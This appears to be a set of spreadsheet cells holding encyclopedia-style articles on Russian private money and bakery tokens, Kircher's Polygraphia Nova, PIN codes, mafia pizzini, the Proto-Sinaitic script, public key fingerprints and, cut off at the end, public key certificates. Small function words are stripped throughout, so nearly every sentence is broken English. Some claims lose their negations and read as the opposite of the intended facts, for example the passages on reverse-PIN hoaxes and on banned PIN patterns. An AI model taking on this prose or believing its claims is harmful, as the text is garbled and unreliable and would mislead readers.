bakeries. used small change regular customers, bakers release tokens element prestige. they denominations surnames them, example, five-kopeck denomination signature: "bakery i.p. berezina" (russian: булочная березина), "bakery suslov" (russian: булочная суслова), etc. sometimes denomination medal indicated money terms, weighted one: larin hlba." (russian: ларин хлъба)well-known owners bakeries bakeries consider necessary specify stamps baking activities, regular customers knew well. however, time leaving names and/or address bonds private entrepreneurs emission private money russia banned 1870. time, private bons, including metal ones, continued produced received relatively wide distribution. example, private money form paper coupons produced urkach salt works. workers employees received part earnings similar bonuses bought shops belonging firms. siberian gold miner n.bazilevsky, second half 19th century released money 10-kopeck bons, wrote: "these stamps issued instead cash employees company receive back also cash food merchandise, taken commercial stores stocks. struggle workers early twentieth century forced entrepreneurs avoid issuing bons behalf. owners factories began organize enterprises various kinds consumer societies cooperative partnerships wide network shops shops, behalf bons issued. sormovo worker, m.i. knyazev, recalling time, wrote: "until 1896, wages issued twice year. soon order changed, workers began receive money every month. however, salary payments systematically delayed. cases, workers, without even realizing actually lent owners factories significant part wages without interest. instead money workers, paid stamps, so-called fofan (each costing 25-30 kopecks). take food goods shop, existed sormovo guise consumer organization. sormovo workers could also receive products private shops sormov (merchants popov, kotov, tyutin) fofan, agremeent. private banknotes late 18th century release zorich's banknotes tuchkov reports following: zorich also started various factories estate, like silk fabrics, linen, sailing, rope, cloth leather. institutions, apart loss, almost bring anything him. zorich, seems, invented means making debts. even invented bank notes. these small printed pieces special kind, price rubles, written price estate. need money, signed gave out. shklov, accepted willingly. death, arrangements mainly paid banknotes, rather rubles, papers interest real bills, used government bonds. judging notes tuchkov, time release circulation banknotes must considered period zorich's life, shklow, death catherine great briefly summoned paul military service, soon fell disgrace returned shklov. thus, beginning emission banknotes attributed last years 18th century. they destroyed 1800, death zorich. history retained zorich's banknotes, basis tuchkov's description right recognize ordinary promissory notes usual type, rather commonly understood "banknotes", called contemporary tuchkov. «maltsovka» malt'sov russian industrialist, created maltsovsky factory district, covering area 215,000 hectares, located along bolva river, tributary desna zhizdre river, tributary lands adjacent districts oryol province (which included bryansk), kaluga smolensk provinces. general, industry multi-populated district conglomerate wide variety enterprises iron foundries machine-building plants, glass, crystal faience, paper-making even distilleries, breweries honeymakers, mention small subsidiary enterprises. during heyday maltsov industrial district, large factories alone. maltsov factories gave earnings almost hundred thousand people, counting indigenous population, also surrounding peasantry, hired side work factories transportation ore, fuel, coal, forest work, possession maltsov heyday, practically, self-sufficient economic zone created, provided necessary. from outside, products, tea, manufactured goods so-called "colonial" goods purchased. notable phenomena economic life maltsov possessions issue money surrogates coupons face value kopecks rubles, connected, likely, crisis monetary system broke russia turn fifties sixties. difficult situation exacerbated lack circulation small coin. with decrease value ruble termination exchange, silver coin began disappear circulation, profitable remelt products sell abroad. even small coin disappeared circulation, settling hands population, trying hedge possible financial losses. early 1860s maltsov's "notes" readily accepted neighboring landlords quitrent, also paying various state taxes. maltsov "notes" cease simply coupons getting products factory warehouses, prepared future plant management. they become means circulation trade neighboring counties. mentioned "money paper signs, circulated local markets government money" essay sakharov, dedicated memories kaluga governor. workers maltsovsky district "general money" trade adjacent counties three russian provinces willingly uses circulation. maltsov's "banknotes", highly liquid means payment, become, sense, kind money, stable means circulation admitted government. november 1870 issues notes terminated additional government orders issued toughen control unauthorized emissions money surrogates. total mass notes issued amount (according various sources) 2.5-3 million rubles, time issue banned, remained uncalled million rubles. subsequently, maltsov industrial trade association spent additional thousand rubles cover demands payment. sebryakov's bons first "time bank" 1870, promulgated prohibited private money, mind cases "maltsovka". however, denomination rubles kopecks, contrast bonds sebryakov. under socage economy system, serf peasant worked part week land allotment, worked rest week landowner estate, thus practicing land allocated landowner. socage free forced labor serf peasant landowner's household, typically russian form labor second half 18th century. according 1797 three-day corvee, peasant family work horse landowner three days week. moreover, week wife, daughter mother serf work. account days worked estate sebryakov four types chips used, printed solid white half-board black paint, without date release: walking male working rectangular shape, measuring 47.5x22.5 female working form circle diameter children's work triangular shape equestrian work day. conditions closed rural life bonuses could become limited local payment value, followed certain measure labor. "day labor bons", circulation estate sebryakov, served take account days worked corvee. earned accumulated excess prescribed norm, economic stimulus work, served yardstick labor. probable worker could sell exchange extra "day labor bons" equal peasant thus, free forced labor became commodity. bons tokens consumer organization russia, consumer organizations emerged abolition serfdom. first riga, whose articles association approved 1865. 1901, companies registered, 1917 thousand them, comprising million shareholders. most russian consumer organizations worked "discount" model, meaning making agreement entrepreneurs selling good shareholders consumer organizations lower price. board company produced special paper metal tokens different denominations, supplied members. this accounted amount purchases goods shareholder. urban water pipes tokens construction water pipes russian cities late 19th early 20th centuries caused appearance special coupons tokens right receive water water booths. paper coupons often used, cities also produced metal tokens. such water tokens known produced tula, volgograd, voronezh, krasnoyarsk, novocherkassk, orenburg, perm, sverdlovsk, chelyabinsk, yaroslavl.the water pipes voronezh appeared 1869, thanks merchant stepan kryazhov. pipes equipment brought england english specialists. first water pump provided water central streets city. water supply supplied citizens thousand buckets water day. taken water carriers water-collecting basins transported population districts without water supply. city duma determined annual water standards: inhabitant buckets, 804, horse 1358 buckets. municipal tokens instead water pipes tokens values volumes water, city councils, case water supply network belonged city, issued "municipal" bons tokens. with possible purchase services goods produced government, first place, water supply. references</t>
  </si>
  <si>
    <t>Polygraphia Nova</t>
  </si>
  <si>
    <t>polygraphia nova universalis combinatoria arte directa 1663 work jesuit scholar athanasius kircher. kircher's highly regarded works: complete work subject cryptography, although made passing references topic elsewhere.: book distributed private gift selected european rulers, also received arca steganographica, presentation chest containing wooden tallies used encrypt decrypt codes.: background kircher reported origin work request holy roman emperor ferdinand develop kind lingua universalis" would allow written communication peoples. emperor knew earlier secret communication system developed johannes trithemius 1518 work polygraphia, dedicated steganography, wanted know system could used bridge different languages.systems cryptography developed italy late medieval times 17th century many rulers employed cipher secretaries diplomatic sensitive communication.: thirty years gave rise range scholarly publications summarising existing knowledge field, growing interest relationship cryptography linguistics. emperors ferdinand leopold ruled empires speaking many different languages, particularly interested field.: jesuit order played important role spreading idea mathematics kind universal scientific language. well geometry theoretical mathematics, jesuit scholars worked number applied projects, including calculating machines kircher designed described 1637 work specula melitensis encyclica organum mathematicum built emperor ferdinand iii. means jesuits sought cultivate court patronage strengthen propagate catholic faith. kircher established interest origins underlying unity languages writing systems, explored various works including prodromus coptus (1636), lingua aegyptiaca restituta (1643) turris babel (1679). also studied voynich manuscript, although apparently success decoding introduction title page polygraphia nova carries emblem hand divine creator holding compass describing circle bears motto omnia sunt, omnibus unum ("all things one, things"). this axiom central kircher's intellectual work, explored phenomena different countries, different times different belief-systems shared fundamental unity. axiom echoed earlier beliefs catalan neoplatonist ramon llull (1232-1316) philosophy saint bonaventure, believed divine permeated aspects existence, however apparently different might 'quia vero summe unum omnimodum, ideo omnia omnibus' ('but highly every measure, reason although things many one').in introduction, kircher claimed book would allow correspondents part world exchange letters without speaking other's languages.: section, kircher acknowledged work earlier scholars, work thus presented compendium approaches previously brought together. section polygraphia nova composed thee sections. first, reduction language offered kind translation device involving codes vocabulary lists assigned two-part symbol roman numeral arabic numeral. first part indicated meaning: kircher provided 1048 multilingual groups words arranged pages tables organised alphabetically order latin column. thus example entry "magnitudo, grandezza, grandeur, grandeza, grösse" (greatness). words assigned first-part symbol. second part denoted grammatical function (e.g. noun ("greatness"), verb ("make great") adjective ("great")).this would allow writer language record version text code reader speak language could translate intermediate code own. based tironian notes system, supposedly devised cicero's secretary. 1624 augustus younger, duke brunswick-lüneburg published book outlining system, pseudonym 'gustavus selenus', scholars also described kircher's work therefore original, appended universal dictionary, making workable system rulers access copy book. section while first section concerned communicating meaning languages intermediary code, second section, extension language allows conversion letters latin words, regardless language encoded. means word original language rendered latin prose; reader language dictionary latin words discover original letter corresponds. this section based largely work johannes trithemius. kircher reminded reader purpose work make possible conversion kings princes around world, said method described would allow message written could understood language.: section three third section, technologia vigenère cipher. explains tally sticks included arca cista steganographica (steganographic urn), chest twenty-four compartments holding sticks used like slide rules rapidly encode decode messages. thus kircher claims, phrase cave quem nosti ('beware know) easily translated languages, including hebrew, greek, arabic chinese. distribution kircher keep organised record people sent copy polygraphia nova arca steganographica distribution must inferred correspondence. complicate matters, early exemplars sent complete book, manuscript versions afterwards became sections; later follow sending complete book. some recipients sent book, arca; sent directly kircher himself, others sent intermediaries rulers enjoy direct contact.: first arca sent ferdinando medici, grand duke tuscany 1659, kircher sent texts cryptography emperor leopold, archduke leopold wilhelm austria, bernard ignaz martinitz, augustus younger, duke brunswick-lüneburg, maximilian heinrich, elector cologne pope alexander vii. 1661 kircher sent arca emperor's younger brother, archduke charles joseph austria, turned contain number errors. difficulty using arca without full explanatory manual prompted kircher produce single, standard edition various manuscripts, started sending copies polygraphia nova june 1663.: 287–91 legacy although work much admired, chests tally sticks, evidence ruler used attempt translations suggested. known instance someone using techniques described polygraphia nova august 1663 letter kircher long-time correspondent juan caramuel lobkowitz, also sent copy.: 1989 eduardo paolozzi created sculpture fountain entitled polygraphia nova schwabing, munich. external links (illustrations) page dictionary composing texts kircher’s universal language, polygraphia nova, table dictionary translating kircher’s universal language back vernaculars, polygraphia nova, steganographic ark, polygraphia nova, bibliography bauer, f.l., polygraphia nova universalis. informatik spektrum 234–239 (2005) strasser, gerhard lingua universalis: kryptologie theorie universalsprachen jahrhundert, kommission harrassowitz 1988 isbn 978-3-447-02814-1 gunkel, david lingua machina: computer-mediated communication tower babel configurations volume number winter 1999, johns hopkins university press eco, umberto, search perfect language, wiley-blackwell 1997 isbn 978-0-631-20510-4 references</t>
  </si>
  <si>
    <t>Personal identification number</t>
  </si>
  <si>
    <t>personal identification number (pin), sometimes redundantly number code, numeric (sometimes alpha-numeric) passcode used process authenticating user accessing system. facilitating private data exchange different data-processing centers computer networks financial institutions, governments, enterprises. pins used authenticate banking systems cardholders, governments citizens, enterprises employees, computers users, among uses. common usage, pins used transactions, secure access control (e.g. computer access, door access, access), internet transactions, restricted website. history originated introduction automated teller machine (atm) 1967, efficient banks dispense cash customers. first system barclays london, 1967; accepted cheques machine-readable encoding, rather cards, matched cheque. 1972, lloyds bank issued first bank card feature information-encoding magnetic strip, using security. james goodfellow, inventor patented first personal identification number, awarded 2006 queen's birthday honours.mohamed atalla invented first pin-based hardware security module (hsm), dubbed "atalla box," security system encrypted messages protected offline devices un-guessable pin-generating key. 1972, atalla filed u.s. patent 3,938,091 verification system, included encoded card reader described system utilized encryption techniques assure telephone link security entering personal information transmitted remote location verification.he founded atalla corporation (now utimaco atalla) 1972, commercially launched "atalla box" 1973. product released identikey. card reader customer identification system, providing terminal plastic card capabilities. system designed banks thrift institutions switch plastic card environment passbook program. identikey system consisted card reader console, customer pads, intelligent controller built-in electronic interface package. device consisted keypads, customer teller. allowed customer type secret code, transformed device, using microprocessor, another code teller. during transaction, customer's account number read card reader. this process replaced manual entry avoided possible stroke errors. allowed users replace traditional customer verification methods signature verification test questions secure system. recognition work system information security management, atalla referred "father pin".the success "atalla box" wide adoption pin-based hardware security modules. verification process similar later 3624. 1998 estimated transactions united states routed specialized atalla hardware modules, 2003 atalla secured machines world, increasing 2006. atalla's products protect million card transactions every 2013, still secure majority world's transactions 2014. financial services usage context financial transaction, usually private "pin code" public user identifier required authenticate user system. situations, typically user required provide non-confidential user identifier token (the user confidential gain access system. upon receiving user pin, system looks based upon user compares looked-up received pin. user granted access number entered matches number stored system. hence, despite name, personally identify user. printed embedded card manually entered cardholder automated teller machine (atm) point sale (pos) transactions (such comply emv), card present transactions, internet phone banking. length international standard financial services management, 9564-1, allows pins four twelve digits, recommends usability reasons card issuer assign longer digits. inventor atm, john shepherd-barron, first envisioned six-digit numeric code, wife could remember four digits, become commonly used length many places, although banks switzerland many countries require six-digit pin. validation there several main methods validating pins. operations discussed usually performed within hardware security module (hsm). 3624 method earliest models 3624, used method generate termed natural pin. natural generated encrypting primary account number (pan), using encryption generated specifically purpose. this sometimes referred generation (pgk). this directly related primary account number. validate pin, issuing bank regenerates using method, compares entered pin. natural pins cannot user selectable derived pan. card reissued pan, must generated. natural pins allow banks issue reminder letters generated. 3624 offset method allow user-selectable pins possible store offset value. offset found subtracting natural customer selected using modulo example, natural 1234, user wishes 2345, offset 1111. offset stored either card track data, database card issuer. validate pin, issuing bank calculates natural method, adds offset compares value entered pin. visa method visa method used many card schemes visa-specific. visa method generates verification value (pvv). similar offset value, stored card's track data, database card issuer. this called reference pvv. visa method takes rightmost eleven digits excluding checksum value, validation index (pvki, chosen six, pvki indicates cannot verified pvs) required value make 64-bit number, pvki selects validation (pvk, bits) encrypt number. from encrypted value, found.to validate pin, issuing bank calculates value entered compares value reference pvv. reference calculated match, correct entered. unlike method, visa method derive pin. value used confirm entered terminal, also used generate reference pvv. used generate randomly generated, user-selected even derived using method. security financial pins often four-digit numbers range 0000–9999, resulting 10,000 possible combinations. switzerland issues six-digit pins default.some systems default pins allow customer change default one, change first access mandatory. customers usually advised pin-based spouse's birthdays, driver license numbers, consecutive repetitive numbers, schemes. some financial institutions give permit pins digits identical (such 1111, 2222, ...), consecutive (1234, 2345, ...), numbers start zeroes, last four digits cardholder's social security number birth date.many verification systems allow three attempts, thereby giving card thief putative 0.03% probability guessing correct card blocked. this holds pins equally likely attacker information available, case many generation verification algorithms financial institutions manufacturers used past.research done commonly used pins. result without forethought, sizable portion users find vulnerable. "armed four possibilities, hackers crack pins. allow fifteen numbers, accounts quarter card-holders."breakable pins worsen length, wit: problem guessable pins surprisingly worsens customers forced additional digits, moving probability fifteen numbers (not counting 7-digits phone numbers). fact, half 9-digit pins reduced dozen possibilities, largely people tempting 123456789. remaining 64%, there's good chance they're using social security number, makes vulnerable. (social security numbers contain well-known patterns.) implementation flaws 2002, students cambridge university, piotr zieliński mike bond, discovered security flaw generation system 3624, duplicated later hardware. known decimalization table attack, flaw would allow someone access bank's computer system determine card average guesses. reverse hoax rumours e-mail internet circulation claiming event entering backwards, enforcement instantly alerted well money ordinarily issued entered correctly. intention scheme would protect victims muggings; however, despite system proposed states, atms currently existence employ software. mobile phone passcodes mobile phone protected. enabled, (also called passcode) mobile phones four eight digits recorded card. entered incorrectly three times, card blocked personal unblocking code (puc puk), provided service operator, entered. entered incorrectly times, card permanently blocked, requiring card mobile carrier service. pins also commonly used smartphones, form personal authentication, know able unlock device. after number failed attempts entering correct pin, user blocked trying allocated amount time, data stored device deleted, user asked enter alternate information owner expected know authenticate. whether formerly mentioned phenomena occur failed attempts entering depends largely upon device owner's chosen preferences settings. also safetypin software campus card transaction authentication number references</t>
  </si>
  <si>
    <t>Pizzino</t>
  </si>
  <si>
    <t>pizzino (italian pronunciation: [pitˈtsiːno]; plural pizzini) italian language word derived sicilian language equivalent pizzinu meaning "small piece paper". word widely used refer small slips paper sicilian mafia uses high-level communications. sicilian mafia boss bernardo provenzano among best known using pizzini, notably instruction matteo messina denaro become successor. pizzini mafiosi significantly aided police investigations. provenzano case provenzano used version caesar cipher, used julius caesar wartime communications. caesar code involves shifting letter alphabet forward three places; provenzano's pizzini code same, replaced letters numbers indicating position alphabet.for example, reported note provenzano read 512151522 191212154 agreed holidays..." this name decoded "binnu riina".discovery channel news quotes cryptography expert bruce schneier saying "looks like kindergarten cryptography keep sister out, keep police out. expect someone computer illiterate?" references</t>
  </si>
  <si>
    <t>Proto-Sinaitic script</t>
  </si>
  <si>
    <t>proto-sinaitic (also referred sinaitic, proto-canaanite found canaan, north semitic alphabet, early alphabetic) considered earliest trace alphabetic writing common ancestor ancient south arabian script phoenician alphabet, many modern alphabets including greek alphabet. according common theory, canaanites hyksos spoke semitic language repurposed egyptian hieroglyphs construct different script. script attested small corpus inscriptions found serabit el-khadim sinai peninsula, egypt, dating middle bronze (2100–1500 bc).the earliest proto-sinaitic inscriptions mostly dated mid-19th (early date) mid-16th (late date) century principal debate early date, around 1850 late date, around 1550 choice date decides whether proto-sinaitic proto-canaanite, extension locates invention alphabet egypt canaan respectively. however, discovery wadi el-hol inscriptions near nile river shows script originated egypt. evolution proto-sinaitic various proto-canaanite scripts bronze based rather scant epigraphic evidence; bronze collapse rise semitic kingdoms levant proto-canaanite clearly attested (byblos inscriptions 10th–8th century khirbet qeiyafa inscription 10th century bc).the proto-sinaitic inscriptions discovered winter 1904–1905 sinai hilda flinders petrie. added number short proto-canaanite inscriptions found canaan dated 17th 15th centuries recently, discovery 1999 wadi el-hol inscriptions, found middle egypt john deborah darnell. wadi el-hol inscriptions strongly suggest date development proto-sinaitic writing mid-19th 18th centuries discovery winter 1905, william matthew flinders petrie wife hilda petrie (née urlin) conducting series archaeological excavations sinai peninsula. during serabit el-khadim, extremely lucrative turquoise mine used twelfth thirteenth dynasty eighteenth mid-twentieth dynasty, petrie discovered series inscriptions site's massive invocative temple hathor, well fragmentary inscriptions mines themselves. petrie immediately recognized hieroglyphic characters inscriptions, upon closer inspection realized script wholly alphabetic combination logograms syllabics egyptian script proper. thus assumed script showed script turquoise miners devised themselves, using linear signs borrowed hieroglyphics. published findings london following year.ten years later, 1916, alan gardiner, premier egyptologists early mid-20th century, published interpretation petrie's findings, arguing glyphs appeared early versions signs used later semitic languages phoenician, able assign sound values reconstructed names letters assuming represented would later become common semitic abjad (one example provided character gardiner assigned sound grounds derived egyptian glyph 'house' similar similarly-shaped phoenician character, called bet. name commonly thought derive semitic word house, bayt, providing another layer support thesis.) using hypothesis, gardiner able affirm petrie's hypothesis mystery inscriptions religious nature, model allowed often recurring word reconstructed lbʿlt, meaning ba'alat" accurately, (the) lady" "lady" hathor. likewise, allowed another recurring word mʿhbʿlt translated "beloved (the) lady", reading became acceptable lemma found carved underneath hieroglyphic inscription read "beloved hathor, lady turquoise". gardiner's hypothesis allowed researchers connect letters inscriptions modern semitic alphabets, resulted inscriptions becoming much readable, leading hypothesis' immediate acceptance. proto-sinaitic inscriptions serabit inscriptions sinai inscriptions best known carved graffiti votive texts mountain sinai called serabit el-khadim temple egyptian goddess hathor (ḥwt-ḥr). mountain contained turquoise mines visited repeated expeditions years. many workers officials nile delta, included large numbers canaanites (i.e. speakers early form northwest semitic ancestral canaanite languages late bronze age) allowed settle eastern delta.most forty inscriptions found among much numerous hieratic hieroglyphic inscriptions, scratched rocks near turquoise mines along roads leading temple.the date inscriptions mostly placed 17th 16th century bc.four inscriptions found temple, small human statues either side small stone sphinx. they crudely done, suggesting workers made illiterate apart script. inscriptions canaan only inscriptions found canaan itself, dated 17th 15th centuries they short, consisting couple letters, written canaanite caravaners soldiers egypt. they sometimes name "proto-canaanite", although term "proto-canaanite" also applied early phoenician ancient hebrew writings. wadi el-hol inscriptions wadi el-hol inscriptions (arabic: وادي الهول wādī al-hawl 'ravine terror') carved stone sides ancient high-desert military trade road linking thebes abydos, heart literate egypt. they dated somewhere 1900 1800 they wadi qena bend nile, approx. 25°57′n 32°25′e, among dozens hieratic hieroglyphic inscriptions.. rock inscriptions valley appear show oldest examples phonetic alphabetic writing discovered date.the inscriptions graphically similar serabit inscriptions, show greater hieroglyphic influence, glyph apparently read alphabetically: first (h1) figure celebration [gardiner a28], whereas second (h2) either child [gardiner a17] dancing [gardiner a32]. latter, graphic variants (such hieroglyphs used write canaanite word hillul "jubilation") rather different consonants. brian colless published translation text, signs treated logograms (representing whole word, single consonant) rebuses: [vertical] [vertical] excellent banquet (mšt r[ʾš]) celebration (h[illul]) ʿanat (ʿnt). [it] provide (ygš) (ʾl) [horizontal] [horizontal] plenty (rb) wine (wn) [and] victuals (mn) celebration (h[illul]). sacrifice (ngṯ) (ʾ‍[lp]) prime fatling r[ʾš])."here, aleph, whose glyph depicts head logogram used represent word "ox" (*ʾalp), whose glyph depicts celebration, logogram words "celebration" (*hillul) "she/her" (hiʾ‎), resh, whose glyph depicts man's head, logogram word "utmost/greatest" (*raʾš). this interpretation fits pattern surrounding egyptian inscriptions, celebrations goddess hathor involving inebriation. proto-canaanite synonym proto-sinaitic proto-canaanite, also referred proto-canaan, canaanite, canaanite, name given proto-sinaitic script 16th century bc), found canaan. synonym paleo-phoenician paleo-hebrew script proto-canaanite also used referring ancestor phoenician paleo-hebrew script, respectively, cut-off date, typically 1050 undefined affinity proto-sinaitic.while extant inscription phoenician alphabet older 1050 proto-canaanite used early alphabets used 13th 12th centuries phoenicia. however, phoenician, hebrew, canaanite dialects largely indistinguishable 11th century writing system essentially identical. possible example proto-canaanite, inscription ophel pithos, found 2012 pottery storage excavations south wall temple mount israeli archaeologist eilat mazar jerusalem. inscribed letters inch high, five complete, traces perhaps three additional letters written proto-canaanite script. history letters earliest script used semitic languages shown derived egyptian hieroglyphs. 19th century, theory egyptian origin competed alongside theories phoenician script developed akkadian cuneiform, cretan hieroglyphs, cypriot syllabary, anatolian hieroglyphs. then proto-sinaitic inscriptions studied alan gardiner identified word bʿlt "lady" occurring several times inscriptions, also attempted decipher words. 1950s 1960s, william albright published interpretations proto-sinaitic show derivation canaanite alphabet hieratic, leading commonly accepted belief language inscriptions semitic script hieratic prototype.the proto-sinaitic inscriptions, along contemporary parallels found canaan wadi el-hol, thus hypothesized show intermediate step egyptian hieratic phoenician alphabet.according "alphabet theory", early semitic proto-alphabet reflected proto-sinaitic inscriptions would given rise ancient south arabian script proto-canaanite alphabet time late bronze collapse (1200–1150 bc). albright hypothesized graphic form proto-sinaitic characters derive egyptian hieroglyphs, given sound value first consonant semitic translation hieroglyph (many hieroglyphs already used acrophonically egyptian.) example, hieroglyph "house" rectangle partially open along side, "o1" gardiner's sign list) adopted write semitic /b/, first consonant baytu, semitic word "house". according alphabet hypothesis, shapes letters would evolved proto-sinaitic forms phoenician forms, names letters would remained same.an alternative hypothesis recently proposed brian colless (2014), believes letters phoenician alphabet counterparts byblos syllabary, seems proto-alphabet evolved simplification syllabary, moving syllabic consonantal writing, style egyptian script (which normally indicate vowels); goes goldwasser hypothesis (2010) original alphabet invented miners sinai.a transitional stage proto-canaanite phoenician (1000–800 proposed authors werner pichler origin libyco-berber script used among ancient libyans (i.e. proto-berbers) citing common similarities proto-canaanite proper early north arabian descendants. synopsis below table synoptically showing selected proto-sinaitic signs proposed correspondences phoenician letters egyptian hieroglyphs. also shown sound values, names, descendants phoenician letters. ancient south arabian libyco-berber scripts letters proto-canaanite correspondences shown. other section shows corresponding modern greek, etruscan, latin letters. also tell es-safi inscription ugaritic alphabet references further reading albright, william (1966). proto-sinaitic inscriptions decipherment. biggs, dijkstra, corpus proto-sinaitic inscriptions, alter orient altes testament, neukirchener verlag, 1990. butin, romanus (1928). "the serabit inscriptions: decipherment significance inscriptions". harvard theological review. (1): 9–67. doi:10.1017/s0017816000021167. s2cid 163011970. butin, romanus (1932). "the protosinaitic inscriptions". harvard theological review. (2): 130–203. doi:10.1017/s0017816000001231. s2cid 161237361. colless, brian (1990). "the proto-alphabetic inscriptions sinai". abr-nahrain ancient near eastern studies. 1–52. doi:10.2143/anes.28.0.525711. colless, brian (1991). "the proto-alphabetic inscriptions canaan". abr-nahrain ancient near eastern studies. 18–66. doi:10.2143/anes.29.0.525718. colless, brian "the byblos syllabary proto-alphabet", abr-nahrain ancient near eastern studies (1992) 15–62. colless, brian (2010). "proto-alphabetic inscriptions wadi arabah". antiguo oriente. 75–96. colless, brian "the origin alphabet: examination goldwasser hypothesis", antiguo oriente (2014) 71–104. stefan jakob wimmer samaher wimmer-dweikat: alphabet wadi el-hôl first try, göttinger miszellen. beiträge ägyptologischen diskussion, heft 180, göttingen 2001, 107–111 darnell, dobbs-allsopp, (2005). "two early alphabetic inscriptions wadi el-hol: evidence origin alphabet western desert egypt". annual american schools oriental research. 67–71, 73–113, 115–124. jstor 3768583. hamilton, gordon origins west semitic alphabet egyptian scripts (2006) fellman, bruce (2000) "the birthplace abcs." yale alumni magazine, december 2000.[2] sacks, david (2004). letter perfect: marvelous history alphabet broadway books. isbn 0-7679-1173-3. goldwasser, orly, alphabet born hieroglyphs biblical archaeology review 36:02, mar/apr 2010. lake, blake, (1928). "the serabit inscriptions: rediscovery inscriptions". harvard theological review. (1): 1–8. doi:10.1017/s0017816000021155. s2cid 161474162. millard, (1986) "the infancy alphabet" world archaeology. 390–398. ray, john (1986) "the emergence writing egypt" early writing systems; 17/3 307–316. benjamin sass (west semitic alphabets) 1988 important doctoral dissertation completed aviv university, *benjamin sass, genesis alphabet development second millennium ägypten altes testament otto harrassowitz, wiesbaden, 1988. simons, frank (2011). "proto-sinaitic progenitor alphabet" (pdf). rosetta. 16–40. https://archive.org/details/isbn_9780195079937/page/89/mode/1up external links proto-sinaitic inscriptions (byu.edu) proto-sinaitic 18th-14th cent. b.c., mnamon ancient writing systems mediterranean escritura proto-sinaítica spanish), promotora española lingüística (proel).wadi el-holusc west semitic research project site wadi el-hol, photos yale news article wadi el-hol 2000 archeology article wadi el-hol 2000 york times article wadi el-hol 1999 article wadi el-hol 1999</t>
  </si>
  <si>
    <t>Public key fingerprint</t>
  </si>
  <si>
    <t>public-key cryptography, public fingerprint short sequence bytes used identify longer public key. fingerprints created applying cryptographic hash function public key. since fingerprints shorter keys refer used simplify certain management tasks. microsoft software, "thumbprint" used instead "fingerprint." creating public fingerprints public fingerprint typically created following steps: public (and optionally additional data) encoded sequence bytes. ensure fingerprint recreated later, encoding must deterministic, additional data must exchanged stored alongside public key. additional data typically information anyone using public aware examples additional data include: protocol versions used case fingerprints); name holder case x.509 trust anchor fingerprints, additional data consists x.509 self-signed certificate). data produced previous step hashed cryptographic hash function sha-1 sha-2. desired, hash function output truncated provide shorter, convenient fingerprint.this process produces short fingerprint used authenticate much larger public key. example, whereas typical public 2048 bits length longer, typical sha-1 fingerprints bits length. when displayed human inspection, fingerprints usually encoded hexadecimal strings. these strings formatted groups characters readability. example, 128-bit fingerprint would displayed follows: 43:51:43:a1:b5:fc:8b:b7:0a:3a:a9:b1:0f:66:73:a8 using public fingerprints authentication when public received untrusted channel, internet, recipient often wishes authenticate public key. fingerprints help accomplish this, since small size allows passed trusted channels public keys easily fit. example, alice wishes authenticate public belonging bob, contact phone person read fingerprint her, give scrap paper fingerprint written down. alice check trusted fingerprint matches fingerprint public key. exchanging comparing values like much easier values short fingerprints instead long public keys. fingerprints also useful automating exchange storage authentication data. example, authentication data needs transmitted protocol stored database size full public problem, exchanging storing fingerprints viable solution. addition, fingerprints queried search engines order ensure public user downloaded seen third party search engines. search engine returns hits referencing fingerprint linked proper site(s), feel confident injected attacker, man-in-the-middle attack. developed word list facilitate exchange public fingerprints voice channels. public fingerprints practice systems ssh, users exchange check fingerprints manually perform authentication. once user accepted another user's fingerprint, fingerprint refers stored locally along record user's name address, future communications user automatically authenticated. systems x.509-based pki, fingerprints primarily used authenticate root keys. these root keys issue certificates used authenticate user keys. this certificates eliminates need manual fingerprint verification users. systems groove, fingerprints used either approaches: used authenticate keys belonging users, keys belonging certificate-issuing authorities. pgp, normal users issue certificates other, forming trust, fingerprints often used assist process (e.g., key-signing parties). systems cryptographic peer-to-peer networks, fingerprints embedded pre-existing address name formats (such ipv6 addresses, file names identification strings). addresses names already exchanged trusted channels, approach allows fingerprints piggyback them.in pgp, keys created called "key equal lower bits respectively fingerprint. uses refer public keys variety purposes. these not, properly speaking, fingerprints, since short length prevents able securely authenticate public key. 32bit used current hardware generate colliding 32bit seconds. security public fingerprints primary threat security fingerprint second-preimage attack, attacker constructs pair whose public hashes fingerprint matches victim's fingerprint. attacker could present public place victim's public masquerade victim. secondary threat systems collision attack, attacker constructs multiple pairs hash fingerprint. this allow attacker repudiate signatures created, cause confusion. prevent preimage attacks, cryptographic hash function used fingerprint possess property second preimage resistance. collision attacks threat, hash function also possess property collision-resistance. while acceptable truncate hash function output sake shorter, usable fingerprints, truncated fingerprints must long enough preserve relevant properties hash function brute-force search attacks. practice, fingerprints commonly used today based non-truncated sha-1 hashes. 2017, collisions preimages found sha-1. future therefore likely bring increasing newer hash functions sha-256. however, fingerprints based sha-256 hash functions long output lengths likely truncated (relatively short) sha-1 fingerprints. situations fingerprint length must minimized costs, fingerprint security boosted increasing cost calculating fingerprint. example, context cryptographically generated addresses, called "hash extension" requires anyone calculating fingerprint search hashsum starting fixed number zeroes, assumed expensive operation. also fingerprint (computing) word list public-key cryptography authentication management signing party x.509 digital signature rabin fingerprint references</t>
  </si>
  <si>
    <t>Public key certificate</t>
  </si>
  <si>
    <t>cryptography, public certificate, also known digital certificate identity certificate, electronic document used prove validity public key. certificate includes information key, information identity owner (called subject), digital signature entity verified certificate's contents (called issuer). signature valid, software examining certificate trusts issuer, communicate securely certificate's subject. email encryption, code signing, e-signature systems, certificate's subject typically person organization. however, transport layer security (tls) certificate's subject typically computer device, though certificates identify organizations individuals addition core role identifying devices. tls, sometimes called older name secure sockets layer (ssl), notable part https, protocol securely browsing web. typical public-key infrastructure (pki) scheme, certificate issuer certificate authority (ca), usually company charges customers issue certificates them. contrast, trust scheme, individuals sign other's keys directly, format performs similar function public certificate. common format public certificates defined x.509. because x.509 general, format constrained profiles defined certain cases, public infrastructure (x.509) defined 5280. types certificate tls/ssl server certificate transport layer security (tls) protocol well outdated predecessor, secure sockets layer (ssl) protocol ensure communication client computer server secure. protocol requires server present digital certificate, proving intended destination. connecting client conducts certification path validation, ensuring that: subject certificate matches host name (not confused domain name) client trying connect. trusted certificate authority signed certificate.the subject field certificate must identify primary host name server common name. certificate valid multiple host names (e.g., domain subdomains.) such certificates commonly called subject alternative name (san) certificates unified communications certificates (ucc). these certificates contain subject alternative name field, though many also subject common name field backward compatibility. host names contain asterisk (*), certificate also called wildcard certificate. once certification path validation successful, client establish encrypted connection server. internet-facing servers, public servers, must obtain certificates trusted, public certificate authority (ca). tls/ssl client certificate client certificates authenticate client connecting service, instance provide access control. because services provide access individuals, rather devices, client certificates contain email address personal name rather host name. addition, certificate authority issues client certificate usually service provider client connects provider needs perform authentication. some service providers even offer free certificates part packages.while browsers support client certificates, common form authentication internet username password pair. client 